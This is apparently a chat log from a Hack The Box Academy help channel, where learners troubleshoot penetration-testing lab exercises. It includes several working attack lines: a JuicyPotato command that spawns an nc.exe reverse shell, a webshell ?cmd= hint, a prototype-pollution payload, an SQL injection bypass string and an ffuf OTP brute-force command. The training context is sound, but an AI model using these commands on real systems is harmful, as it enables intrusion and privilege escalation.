#modules

Well the point is to “attempt” to access the webshell, then read the error message in the logs.

Don't ask to ask for help, ask for help directly

This seems to give a different response, but I still don’t see what I’m looking for in the logs.

Okay, well basically i’m on the question “Find all TCP ports and submit the total number found” i’ve tried doing numerous scans, with and without -Pn, -T4, -p- and nothing comes up apart from “host seems down, if it’s up but blocking ping probes use -Pn”

if i use -Pn no ports come up

Then there's probably something wrong with your connection

Can you ping the host?

what kind of shell have you used? i mean the contecnt of weshell.php

Did you try resetting the target?

tbh i haven’t tried resetting, i assumed it would be some hidden flag within nmap i need to use

If it says “host seems down” at least make sure the host is up.

when using -Pn it does say “host is up”

but all ports are in ignored state

Can you ping the target??

i can yes but just reset it

if this is what I think it is- path traversal - you may need to go up first with ../../../var/www/html/weshell.php

Brain is dead and fuzzy, but Pn requires sudo? Also try doing it with -v

cool i’ll give it a go

Try switching to a different VPN region

i think you have to run a command to trigger that error

Now that you have the right page add ?cmd=id or go to the page in a browser

try like ?cmd=whoami or id

and then you should see something in logs

id

sometimes switching from upd to tcp or vice versa does the trick. I noticed that sometimes they behave differently.

got it, thanks guys

Should it even matter?
It should still show up in the logs, no?

It will once you trigger the code

I have an XSS-related question I would like to ask. Part of the HTML code is like this:
<span style="font-size: 16px;">Hello, ImXSS</span>
It's known that src, script (in both uppercase and lowercase), and svg code are blocked, but <> is not blocked. How can I test if XSS is effective?

Got it…

Kinda

That helped. 👍🏽

and one more thing, sometimes openvpn connection disconnects(you can check the logs), so there is a chance that you are scanning live IPs from your network. try "traceroute x.x.x.x" It should show only 2 hops on your list.

got it, thank you

Your vpn was down?

that was different question from previous thread. sorry for any confusion caused 🙂

Cool. Your image is a spoiler, please remove.

can someone help me in the log poisoning section?

of cbbh module at the academy?

the question is " Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd"

so what am i missing

Hey, I just started doing a few boxes.

I just did one and all the priv esc exploits were all on the desktop...is this normal? Given, it was rated easy but still, this seems...almost pointlessly simple

Without seeing exactly what you have done, I can only guess.
But a general tip.
Take a close look at the log file. Then think about which quotation marks do what in the log file.

its weird, well as the academy says the one parameter we havev control is the page

so when i did ls ,the marked part did some commands partially

i mean i could ls, but not ls+-la (url encoded)

or couldnt even do cd+/;ls so

why are you using netcat to transfer files? python3 -m http.server 8000 on your own box is a better option IMO. or you can use ssh file transfer, using the scp command.

@acoustic owl mind helpin me out in private?

sure, send me a dm

Hey, I'm doing the Firewall and IDS/IPS Evasion - Hard Lab in the network enumeration with nmap module, and my scans are taking reallyy long for some reason (even if I try to do only "ip -p -sS"), could this be due to the IDS/IPS in place or is it something wrong with what I'm doing?

Run it with -v to check what is happening.

my ip got banned from trying too much, and after the 3 mins passed, it started working, don't know what it was but it is working, still thank you for the help :))

Ah okay the lockout was probably part of the assessment.

Haven't been able to do the modules through my own machine in a week, is anyone else having this issue? Pwnbox is cool but I prefer using my own

Hi, I am stuck in the skills assessment for the Information Gathering module (https://academy.hackthebox.com/module/144/section/1311) on question 4. "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb." Any hints? is the API key from the previous question to be used?

You have found a subdomain. Why don't you apply all the techniques shown in the module to this domain again? Then you should find what you are looking for

Thank you, got it. It is always something so simple...

quick question about how the tiers work in academy. Im currently using the student pass to go through the pentest path way, if I wanna do the the higher tiers (EX: Tier III, IV) after I'm done, is there a different subscription I have to use or do I have to just buy the individual modules?

Working with IDS and IPS - Snort Rule Development :
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

Im stuck tryna find the right keyword

I think it should work both ways, but first figure out which way is most cost effective for you.

i tried http.user_agent or http.uri since they are the most logical keywords to include and match the content in the packet

Hello , I'm stuck in "Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:" , inflitrating windows part module Shells & Payloads.
I'm using msf and I tried different exploit but each time things look nice but I didn't get the shell
Can you help me ?

the format seems to be [word]; with the square bracket and the semi column.

are u sure i need to include the square brackets ?

did you try it? it seems to be yeah

since they look like just some placeholders for [keyword] to tell us to include a keyword followed by a ;

i did

with [http.user_agent]; for example

http.user_agent; isn't the answer either

https://forum.hackthebox.com/t/working-with-ids-ips-snort-rule-development/305483/6
my bad it seems to be keyword;
with the semi-column

what confuses me more is why isn't it the user agent that's required to search within since the rule content content:"|24 7b|jndi|3a|ldap|3a 2f 2f|" is actually found within the user agent

after inspecting the packet too

can't really remember the exploit i use, but did you try the famous one from the course? KInda hard to troubleshot a not-working msf exploit with the infos you gave

Yes I did exactly what is in the course and can't get the shell. something must wrong but can't see what.

I’m currently doing the easy lab for Firewall and IDS/IPS, i’m scanning the target but with -sA for an ACK scan, using -Pn, -n for dns resolution however all same result in all ports are in ignored state

am i missing a flag here

what kind of error do you have? are you connected to the vpn?

I'm using the pwnbox. I've no error but do not get the shell

i just tried it and it works fine. can't say much more of you do not give much more : D

where is the discord windows 7 support lazy devs hmm

Uh

<@&861185840277487616>

How can I send you a screen shot ?

you have to follow the steps at #welcome to link your htb account with discord

Hello I have been struggling with this last question, I have access to shell and I need to gain root rights, I found CVE, sent it to server but bash deny the usage of exploit.c, then how im suppossed to get root rights??? CVE-2021-3156

it just blocks everything

the question ask you to identify the OS of the target, so not sure the flag you used are going in that direction

also used -sV no ports show up

i understand there’s IDS/IPS in play so tried -T 1 -T 0 too

we also know there is a webpage running on the target, that info could give you a clue on which port to scan

yeah, 80 i assume as http

yeah bash can do that : ) where is this? module, section?

? This is a shell, a reverse one, I'm trying to get a root rights

yeah but there is shells everywhere bro

what

you say: " this last question, " Ok but which one, provide the module name and section.

i don't have gcc, blocks install also

that's too much spoil imo

I tried them all that's not spoil

I'm breaking head like 2 hours and just does nothing, nothing helps. Who even made this

Did you check for bash or python script of the exploit?

it's not on python, but what about it?

ok so you can't compile on the target, where else can you compile something?

sorry. I don't want to get ban so early 🙂

Youre using a C script, often there are python scripts as well.

I couldn't find a python one

Okay what was the cve?

CVE-2021-3156

I did it but can't post a screenshot

i don't know man, I just paste the image in the field and it works

i don't think there is a python one iirc
i get it, this is frustrating but just take a step back
you got a vulnerable target,
but you can't compile on this target
so where else can you compile the exploit,
what can you do to make an exploit work even if it is not compile on the target?

man 😕

I tried on local too pal

Module: whitebox attacks
Section: client side prototype pollution

I’ve been stuck for a long time trying to solve the section’s challenge, my payload works locally but still can’t solve the challenge….. need a hint or a little push:
This is my payload:

/profile.php?id=2&proto[src][]=data:,fetch("http://94.237.59.63:49231/admin.php?promote=2")

Fixed the issue, big thanks to @soft reef

yeah my bad i just realised you were on the metasploit module and not somewhere else

Hi guys, I'm on Windows Privilege Escalation Skills Assessment - Part I. I'm trying to escalate privs with juicypotato since I have the SeImpersonate Privilege enabled. i'm not sure why its not working.
c:\windows\temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe 10.10.15.167 8443 -e cmd.exe" -t *

This is the error. Am I barking up the wrong tree?

Hi guys, I'm on Windows Privilege Escalation Skills Assessment - Part I. I'm trying to escalate privs with juicypotato since I have the SeImpersonate Privilege enabled. i'm not sure why its not working.
c:\windows\temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe 10.10.15.167 8443 -e cmd.exe" -t *

This is the error. Am I barking up the wrong tree?

Did you copy nc.exe to the target?

yh

yeah i did. see screenshot above

you can try with another CLSID

can you elaborate?

nvm

got it working. thanks for the tip

but maybe just printspoofer will work since i see you got it there.
i see in my notes i used JP with another clsid, but i can't see it mentionned in the course, so maybe not a good advice
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato#clsid-problems

i''m having issues with the net.sh module on the pivoting section: i've set up the listener but when i try to connect to the DC i get this error.
Update: I have also tried utilizing the etherne1 2 IPv4 address to connect through w/ the same error

are you sure the address in your rdp command 10.129.42.198 is correct? it is in the course, but it doesnt match your netsh config

smh (at myself) lol thanks

what does smh mean?

shaking my head

ah lol ok

Hi guys! I have a question regarding a module. Is this the right place to ask about it?

yes

I have a question about the Introduction to windows command like module and I have been told byt the dev to ask around on the discord for help

have been struggling for the past 2:40 hrs but nothing works

https://academy.hackthebox.com/module/167/section/1614

this is the page of the module

Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

this is the question

I cannot find the file using the given information in the module

did you try using the where command with /R

yeah

i tried where /R C:\Users\htb-student\ waldo.txt

then where /R C:\Users\ waldo.txt

then where /R C:\ ...

you get the idea

i also tried find and findstr

but nothing

In the DNS chapter of Footprinting, the last question to find FQDN of IP ending with 203, I tried zone transferring and found few IPs listed below:

10.129.94.174   inlanefreight.htb
10.129.18.15    app.inlanefreight.htb
10.12.0.1       dev.inlanefreight.htb ns.dev.inlanefreight.htb
10.129.1.6      internal.inlanefreight.htb vpn.internal.inlanefreight.htb
10.129.18.201   mail1.inlanefreight.htb
10.129.34.16    dc1.internal.inlanefreight.htb
10.129.34.11    dc2.internal.inlanefreight.htb
10.129.18.200   mail1.internal.inlanefreight.htb
10.129.1.34     ws1.internal.inlanefreight.htb
10.129.1.35     ws2.internal.inlanefreight.htb
10.129.18.2     wsus.internal.inlanefreight.htb

and with both looping dig and dnsenum tried bruteforcing IPs as well with few dictionaries, but to no success. Any hints as to what I am missing?
Thank you!

What list are you using?

I tried fierce, and top subdomains 11000 jhaddix

These 3

Ok so maybe is another list.

So is it just a different list issue?

Got it@

can anyone help?

:/

i've just solved it today

(through googling)

you need to enum all the possible domains, not only internal.inlanefreight.htb

till u find the correct one

which would give a list of records, one of which is an A record that has the ip x.x.x.203

i just tried with one of the solutions you have written in your previous post and... one is working

Anyone having target performance issues?

Hi!

I'm working through Attacking Common Applications. I am on Attacking Joomla, but when I try to use the exploit the module suggests for Directory Traversal, I get the error that the module click is not found. However, pip identifies the install of click. The Pwnbox won't allow install of Python2.7 so am I missing something?

Hi what exploit are you trying to use?

https://www.exploit-db.com/exploits/46710 but I just realised that somehow I completely missed the next line that gives a Python3 version of the script. 🙄 I feel dumb now.

Ever figure this out? I'm stuck here too.

Nope, not yet

Skipped it for now

hello, i'm doing the "Server-Side attack" module, i'm at the "SSTI Exploitation Example 2", but i want to get a reverse shell without using the tool tplmap, but i can't do it, i don't know why... if someone could help me please 😅

I'm facing this issue on Linux privesc module Miscellaneous Techniques CPTS path
Am i doing something wrong ? even i followed the walkthrough and gave me same error there is no user priv-esc.

If anyone's doing windows lateral movement module then lemme know

Haven’t done this module in a minute but is the command you’re doing exactly what’s in the module?

Yess

where are you running the command from?

First command exactly from the module wakthrough!

Oh my Goshhh i'm an idiot!

Thanks for help thinking out loud guys 😅

please someone can help me with module bypass windows defender
Question "What is the version of the antivirus signatures which are installed?"
i try all way but no solution

I feel like this question is broken. The version reported on the VM is different from the version in the provided solution. @sterile wharf @static roost

how can i do please ?

Hi everyone, I am wondering if I missed something with this module:

I am working my way through 'Windows Event Logs and Finding Evil:
Tapping into ETW' (section 4)

Question is:

Replicate executing Seatbelt and SilkETW as described in this section and provide the ManagedInteropMethodName that starts with "G" and ends with "ion" as your answer. "c:\Tools\SilkETW_SilkService_v8\v8" and "C:\Tools\GhostPack Compiled Binaries" on the spawned target contain everything you need.

I noticed some other people in here had issues with this module, but mine isn't the same issue, and there wasn't anything in the solution when I tried reading through that which indicated I might have fouled something up.

Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

PS C:\Tools\SilkETW_SilkService_v8\v8\SilkETW> .\SilkETW.exe
Program 'SilkETW.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~.
At line:1 char:1
+ .\SilkETW.exe
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed```

As someone suggested in another post I've tried from both PowerShell and the command prompt as an admin. Any thoughts?

#1234357888114364508

i have to go there ?

you don't have to, but it might help to open a new post there

thank

using theHarvester
theHarvester -d (domain) -b google returns invalid source - any reason why?

Need more info; what module are you working on?

oh shoot wrong channel - my apologies

windows defender antivirus

There's no windows defender av module

That's the section name

INTRODUCTION TO WINDOWS EVASION TECHNIQUES

Anyway I wasn't referring to you with the "not enough info" comment

thank

guys

i need help

im stuck on this question

Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ)

i need help

its broken i tried everything

It's likely not broken

Iirc if you do -I it gives you the header

it didnt give anything

Is the target lab spawned?

yea

"Click here to spawn target"

yes i did

You're also specifying http://ip:port

in which command?

should i type that

With curl

I assume the target is a public_ip:port

Also it helps to give the Module name and Section name

So people that have done it can give you better instructions to help

curl -I https://www.inlanefreight.com

Did it tell you to use inlanefreight.com?

It told you to use the spawned webserver

The questions will explicitly tell you when they want you to do inlanefreight.com

ok lemme try

it tells me no such file or directory

Command?

yea

I meant show the command

ok its : http://ip:port

my ip and my port

the ip

🤦‍♀️

http://94.237.59.199:52061:80

Are you doing that with curl?

thats what i typed

Don't do :80 at the end

But also

no

Your terminal is right

Do that with curl

with which command

🤦‍♀️

sorry im new here

like curl http://94.237.59.199:52061

Brother you need to learn how to critically think

Also, stop appending the :80 at the end

ok

You don't need to do that

Like this; but with the spawned target instead

oh ok

Apply some logic

Ik you got a brain in there somewhere. Put it to work

curl: (7) Failed to connect to 94.237.59.199 port 52061 after 5 ms: Couldn't connect to server

it says this

Command?

wait

i typed something wrong

curl -I 94.237.59.199:52061

thats it

@fathom pendant

??

curl -I 94.237.59.199:52061

hello?

@fathom pendant where did u go i need help

...

Dude chill, he will get back to you soon

ok

now where did he go

im waiting

@fathom pendant

are u ignoring me?

bruh

fine i dont need ur help anymore

please re-read the module

^^^

i did

No need to be so rude @heady hamlet

instead of waiting around, maybe try diagnosing while you wait?

buddy no one is obliged to help you, exercise patience or solve it yourself

you will have to do some research in this field

ok i solved it the answer was in the modula already but the command doesnot work with me i just saw the version from the module command

Smh lol

re-read the module, test, test, test, ask chat-gpt to explain things... more because you will be frustrated later on at this pace when things get harder

Sounds like it's solved then

God forbid a girl has hobbies

Module footprinting, Section OracleTNS.

While using odat.py i can't seem to get the credentials, the IP address is the same i've inputted.

you know u can always use chatgpt or google to see if ur right or wrong

ok

but make sure u understand where u went wrong, don't just be like ah yeyeyeye im a do this, literally read and see why u went wrong, try to understand it

anyone do this one yet? https://academy.hackthebox.com/module/113/section/1216 im stuck on the second password. ive dug through every file

Once we obtain foothold on a user machine with a normal user account, although we need admin to dump LSASS proc memory and SAM database, we can still get some value from mimikatz dumping kerberos tickets for the user. correct?

because kerberos tickets for the user we have the password for may give us access to other services on the network?

if it's non elevated you can only extract tickets for that specific user. but if you already have access to the user's creds then the tickets wouldn't grant you anything extra

In the tunneling module, Im trying to do some reverse tunneling with chisel, but the ubuntu box (pivot host) gives me this error- and I cant install anything with apt on it to fix it- any solutions?

even after rebuilding it, restarting machine, etc

since machine has no internet access, this shit is lowk annoying

your glibc version is too new

grab an older version from chisel repo release page

#modules message

Took a break, moved ahead to the next section and came back to this. Ended up in the same spot in case anyone has anything to add.

i've spawn the windows box to check, when i did this module i have not encounter that error

@somber sentinel i just tried, i do not understand how you get that error as it is pretty straight forward, same commands as the course and yours seem correct as far as i can tell. Did you try to respawn the same box to start fresh

Try changing vpn regions? Sometimes that helps

Hello just a quick question, are there any alternatives for downloading files from a Windows machine? I am currently attacking LSASS and extracting the lsass.dmp file, but it seems that the connection is suddenly cut off. I tried firing up an HTTP server from PowerShell, but the download speed is low, and the ETA is around 1 hour. I got the same results when looking up solutions on the module, the connection just cuts off.

you can use a smbserver, but the speed isn't too different from a http upload sever running in your own machine. so maybe check your network connection

choose a vpn server closer to you

Yeah I tried smbserver as well, the error is "network error occured". Currently using pwnbox and the closest one, but will try to look for other servers as well. Thanks!

hmm that should work, reset the target and try again maybe

PIVOTING, TUNNELING, AND PORT FORWARDING -> Remote/Reverse Port Forwarding with SSH

I want to access the windows target, to run my reverse shell payload, but I'm a bit unsure how to. In previous module, SOCKS tunneling was used, but there the windows credentials was also provided.

I'm not sure if I have to just redo the steps from last section, reuse pw's, and then add those steps from the current module in? I have answered the questions, but the module says "In addition to answering the challenge questions, practice this technique and try to obtain a reverse shell from the Windows target."

AD Enumeration & Attacks - Skills Assessment 1
i've tried all variations of the dcsync command, nothing works

i can nslookup and ping the domain controller

which machine are you running mimikatz on

rdp into ms01

that doesn't look like the dc to me

inlanefreight.local is the domain not the dc

oh

in the module example "DCSync" it finds the DC itself

I don't think you need to run mimi on the DC to dcsync

can you check if the host has an interface in the internal network

no i don't think so, i thought he had /dc not /domain

i don't think i ever used mimikatz for that

with ipconfig?

yeah

that's through a pivot? try with nxc smb <ip>

if nothing shows up reset the leb

try /dc and adding the dc manually

it should be able to resolve it though fqdn

but yeah I don't use mimi for dcsync either

resetting it one more time wouldn't hurt

yeah adding /dc doesn't work

searched up the command here and it shows someone getting the hash lol

can you ping the dc

yup ^

what if you put the dc's ip instead of hostname

sounds like you may just need to change regions or something

wait you can reach the DC?

why not just do it remotely instead of using mimi

uhuh

i need to impersonate t* user

is there a way to impersonate remotely?

i've changed regions now

it is the same target so... yes
since the questions are just based on the written content, they give you the opportunity to practice

you have the password

i do

yes so why do you need to imersonate

just use the username and password

i found myself using the linux tools more often for AD attacks like DCSync

doing it with mimikatz/rubeus is kinda annoying

Thanks!

In Windows Fundamental, File System Section. NTFS permission for List-Folder content is specified including executing files also, i guess its mistakenly specified or not?

just a quick tip, i try to not terminate the target at each section, I just check if this is the same one on the next so there is no need to respawn a new one every time

Same but usually they take so long for me so I take a break after each. I did the other module yesterday. But of course I'd probably be able to see if the target "spawns" for the next/previous module aswell.

Should I look into these errors?

this is correct

you can configure msf to use a msfdb but it's not needed in most cases

I believe the metasploit module goes through this

but List Folder Contents permission does not allow the assigned user to execute any files on the corresponding folder, right? then how executing files are possible?

nope with list folder contents you'll gain read and execute

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732880(v=ws.10)

anyone to privately discuss the Attacking Common Services -> SQL module?
I passed it but I've got an unanswered question.

Sure DM.

Execuse me, I want to ask something. Why I can't get the correct answer in ZAP Scanner lesson (Module: Using Web Proxies) while I already submit the correct answer?

Make sure you don't have any spaces at the beginning or end of your answer

I did, but it still says "Incorrect Answer"

Oh sorry nvm, you're right, I have a space at the beginning

Thanks!

Hi

any else got problems with libclntsh.so while installing odat?

running UTM Kali on M1

odat is in the repos if you use parrot or kali, did you try that?

yeah apt install couldn't locate odat

E: Unable to locate package odat

ow

I'm thinking it's not compatible with M1

arm

yeah that's a possibility

couldn't get much of a hint on forums too
https://forum.hackthebox.com/t/help-installing-odat-in-kali-linux/277312

https://github.com/quentinhardy/odat/pull/63/commits/f36bf0eaf068c9a30d9e727bee0ab2f598a84bbc

thanks I'll check it out

I just saw a comment, it seems to be working 🤞

apparently there is also docker :
https://github.com/quentinhardy/odat/tree/master-python3/Docker

this would be great too

thanks for the assistance 🙂

Thanks for checking, I did. I'll give it another shot today. Maybe try changing regions too as @storm elk suggested. Yeah, as modules go this one is fairly straightforward so I am a bit confused too.

I need some clarification on the first question of the Windows File Transfer Methods in the File Transfers module. The question is: Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer. What I'm not seeing is the target where the flag.txt is at. I enumerated the target, but I feel like the question is pointing me to the Pwnbox. I've used wget and understand the web root is a directory on a web server. Any ideas what I'm missing?

Did you spawn the target?

Yep

Is the target where I should be looking for flag.txt?

yes correct.

Okay, thank you!

when i reload the page in devtools no requests shows

can someone help me?

Do you have some more info?

yea

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag

the question and the module is web requests

I would like to ask, will the CPTS exam involve binary? (https://academy.hackthebox.com/module/113/section/2139)

no

has anyone done the bloodhound course? Looking specifically at the BloodHound for BlueTeams section. The last question. Which relationship (edge) do we need to remove to break the path between David and Domain Admins?

not finding anything in plumhound or bloodhound

is there any other, apparently known, sections to cross out?

that section is more of a demo than actually getting you to do it

iirc check the edge in bh

For the HTTP/TLS skill assessment, the speed seems to take a very long time, and I'm constantly getting hit with the error 'no matching response on [Byte x] after the first couple work. I have to keep refreshing the box.

is my command just incorrect?
|| padbuster http://94.237.59.63:54332/token "0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" 16 -encoding 1 -post "token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3" -cookie 'user=e229d8a9e42697ab26f61c38e00db5ae5f1cd90fdb85f20f81a48623746e914d3d2bdd97415095b66b720e552e81fedd00000000000000000000000000000000' -error 'Decryption Error. Invalid Token!' -usebody
||

heya. I started working on the XSS module and quickly realised i should get some basic knowledge of javascript (at least the basic structure and syntax) as i don't really understand what the commands i am entering are and how they function. Are there any websites or youtube playlists you guys can recommend surrounding the basics of javascript?

I had a look and there seem to be 1001 different websites and individuals teaching javascript, so i was hoping there was one you guys can recommend in particular

https://openedg.org/js-institute

https://www.giraffeacademy.com/ isn't bad either

nice thanks, will have a look at them

Sure!

Hello to all. I need some help to understand some strange behaviour. I am on the Remote File Inclusion chapter in the File Inclusion module. I am opening a python http server to download a PHP web shell inside the back end server to get RCE. When i do this from my root folder and my webshell is there the file gets downloaded and I get remote code execution. But when i host the file on a folder such as ~/Bounty/HTB (personal ) folder and I open the python server I still can get the download of the shell but I dont get remote code execution. Do you know whythis is happening?

anyone i could PM about this?

Do you have a screenshot?

yes

lets me create this will paste in a sec

This is when I try to download from a personal folder. you can see the PHP server on the right and the download happening when I request the file

This is when I do the same from the root folder which works directly

again PHP server on the right

this time it works fine

By the way the same result can happen though LFI hehe

look at the dir you started your web server in and then look at your file path in your download command

in the top screenshot, your web server is working in /home/alex/Bounty/HTB, and you request a file at http://ip/home/alex/Bounty/HTB/shell.php, so what you're trying to download is the file at /home/alex/Bounty/HTB/home/alex/Bounty/HTB/shell.php in your machine

second screenshot, your server is in the root dir, and you request /shell.php, so you would be downloading the file at /shell.php on your machine, which happens to be there

Can someone help me on the skills assesment for broken authentification, i have tried tampering with the sesion cookie, brute forcing logins, auth bypass via direct acses but nothing is working.

why is put two times?

because you specified it in your URL

http://ip/home/alex/Bounty/HTB

cool i get that

what should be included. Just again /flag.txt?

whatever you are trying to download, you have to specify the path relative to the location of your web server

so the root server for the server is that HTB folder already?

if i have a file called rev.php in /home/calc/scripts/rev.php and i start my server in /home/calc, then the file in my server can be located at http://ip:port/scripts/rev.php

heheheh i see the light :D

you can test this by starting a web server and then navigating to it in your browser

i udnerstand

Thank you all for your input. That was to the point

oh wait nvm i think i have found smt

Was anyone able to solve the challenge for:
Module: Whitebox Attacks
Section: Client side prototype pollution
?

Just ask your question, plenty of people have solved.

hi dear fellows

I would like to ask where to export this?

as far as i remember is not relevant where you export it

I want to dump, but I don’t know where to click

i think it's right click -> dump memory to file

I've been looking for 30 minutes and still can't find it

select the address, right click on it then Dump Memory to File

you have to righ click on the memory address from here

I found this

But he kept shaking, making it very difficult for me to click

yes, after you identify the right adress here, just right click on it and then dump memory to file

i think if you sort it bt adress, or size, it will get stable

He kept sliding up and down, and I clicked pause

Well if it's still running it'll keep moving

I clicked stop

So how should I save it?

He kept moving causing my dump to fail.

If it's still moving, then you didn't stop it lol

click on type and i think will get stable, or on protection

I can only find this step

I don’t have the energy to search again. Can anyone tell me how to pause it?

someone pllsss help me, i am doing the broken auth skills check and i now have to login for the user gladys but cannot find the otp, i first tried a wordlist with 10000 nums and even 100000 but nothing is working, here is the command im using: ffuf -w ./tokens.txt -u http://94.237.59.63:39183/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=5t6i1j2qu0592dbl65nrclt4ie" -d "otp=FUZZ" -fr "Invalid OTP."

Afaik you don't need to brute it but I haven't done this

??? wdym, i got the login and have already tryed other things like auth bypass via direct accses and attacking session tokens but that doesnt seem to be working

just what others gave said ¯_(ツ)_/¯

what did others sayyy

nothing is working

is emotionaly damaging

who is others?... need to find someone who has done it

Utilize the discord search feature bro

good idea, thc u

noo wayyy did it, u where right i didnt need to brute the 2fa code just needed to: ||send req to profile.php after i loged in even without doing to 2fa||

I have a problem with Pivoting, Tunneling and port forwarding in icmp tunneling task

I cannot ssh to the pivot host

I can confirm that the port is up, by doing nmap scan or banner grab using netcat

however ssh fails every times and timeouts

looking at wireshark I can see that key exchange is initiated, but later I only see TCP Retrensmission packets from my host

followed by TCP RST and connection termination

Am I doing something wrong or the lab is simply not working properly?

Hey, let's say you are going through this content https://academy.hackthebox.com/module/158/section/1428 ( a section in pivoting ) Would you then read the material and then start the box and answer the questions, or start off with starting the box and following through as you progress?

With the pivoting module, I suggest going along with it

yeah I generally start the box and follow the material, reading a doing at the same time

maybe with a quick overview of the whole technique to know where i'm heading

Hello. I am sorry but i cannot post somewhere else. (is that normal?)

yes, read #welcome

and also i paste the course into obsidian so i have to reformat certain things, check if any tools are needed etc

My Hero

Is that ok to fully customize the box we have?

Hello everyone I'm stuck on a SQLi problem, I want id = 5 I use the OR operator for queries but it does not work https://academy.hackthebox.com/module/33/section/799

if you are referring to the pwnbox, it is your instance. you may customize it as you see fit, you will just need to save the config to your machine

i tried also like that

i don't remember how to save the config, but i believe it is explained somewhere in the HTB help documentation

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox

alright, thanks again

What are ppl using 4 notetaking? Using obsidian. Thinking of switching to something more online. Perhaps github?

Personally i use CherryTree

That's not online I.e cloud web though is it?

Oh, sorry, didn't read that point

This is likely off topic tbf

Looks like this is a not a free feature

the Pwnbox

you can use everything, obsidian, cherrytree, onenote

free users can only use it for two hours yes

but most people use their own virtual machine

i'll do that way too

Iirc, unless they changed it recently, you can only save on the labs pwnbox, the academy one does not have a way to do so.

Notion gets mentioned a lot for online notes. Or you can keep using obsidian and put all your notes into a repo and push that to your git repository of choice.

anyone ?

What was your query?

it's ok, i'll do without pwnbox. I am poor.

i use admin') OR id = 5-- -, my queries find admin but doesn't show me the user with id 5

Looks like admin is true, so it returns that. Try a non existent username?

Everything after -- is being ignored

Its close, but you are using admin and id 5.

yes and that what i want after after my request that it be ignored so that it displays the username with the id 5 after maybe I misunderstood

Yes so maybe you dont need the admin

yesss i understand thank everyone

these might help as well https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection#authentication-bypass

I found it, but why put a user that doesn't exist if you want to retrieve the id of an existing user?

Hello - Got a "question" about the skill assessmentn of the footprinting module easy-lab --> in the descripton it is stated that 3 internal servers has to be tested - first is a DNS server - whats the point of this - no DNS server has to be tested? Shouldnt this intro be removed or updated or am I missing anything?

ah because even if the gold operator user has a request that is true, it will be able to return the id = 5?

its an OR statement, so user that doesnt exist is false OR id=5 is true. I think even works without user.

ok ok thanks it's clearer in my mind

indeed it works without anything

#1234357888114364508 would be a good place for this

ok

Did you see port 53?

yes i did

I don't have specifics in my notes but iirc it's a ftp proxy and there's nothing to solve via dns

yep

Ok so its running a dns server.

but it doesnt have to be tested or enumerated...

anyway

yes it does, we are talking Footprinting - Easy Lab right?

right

u only have to ssh to the machine - thats all

Did you get the flag?

yes

are you sure its footprinting?

100%

k give me a sec, im gonna log in

hey @ocean night possible to dm you?

Sure - will help if I can

module: WINDOWS PRIVILEGE ESCALATION
section: Credential Hunting

found passwords in
||Documents\stuff.txt
AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt
C:\inetpub\wwwroot\web.config||

none of them are accepted, any help?

How did you search?

using findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

You're on the right track.

Hey, anyone did API attacks? In the Mass Assignment section what are we supposed to do? I created an order and trying to add items. I added success message = true and price = 0 but nothing works

the hint says to start in Users, so that should speed up going through files

Yes look for interesting files like config files, settings etc..

thanks. I thought about pushing my notes to a git repo, but in a sense i want them to be viewable via a browser. so really i should just use git i suppose

github renders markdown

yeah i've been thinking i should just use git hub

although i just read that notion allows u to publish your notes to the web

Did you read the hint?

obsidian notes are markdown?

Yes

Then you know which endpoint you should use

In the Orders end point, I added OrderItems. It doesn't seem to be processing it. In the Items end point, it seems not to like product ID. I tried adding SuccessMessage:true and price:0 nothing works

I know the endpoint. I don't know the parameter name.

send me a dm

Can i ping someone to get a hint for AD Trust Attacks - Skills Assessment? thank you

hey im re-doing the "Information Gathering Web Edition - Skills Assessment" does anyone know how to specify the port for thereconspider.py. It seems like entire tool recently got a recall

Ye some extended markdown, latex support as well, and ofc html

? The one from the module?

it was i dont understand the problem he's trying to create for him/herself

It's the same you'd specify as if viewing the page via browser; http://site.htb:port

I thought that as well but i started getting this error

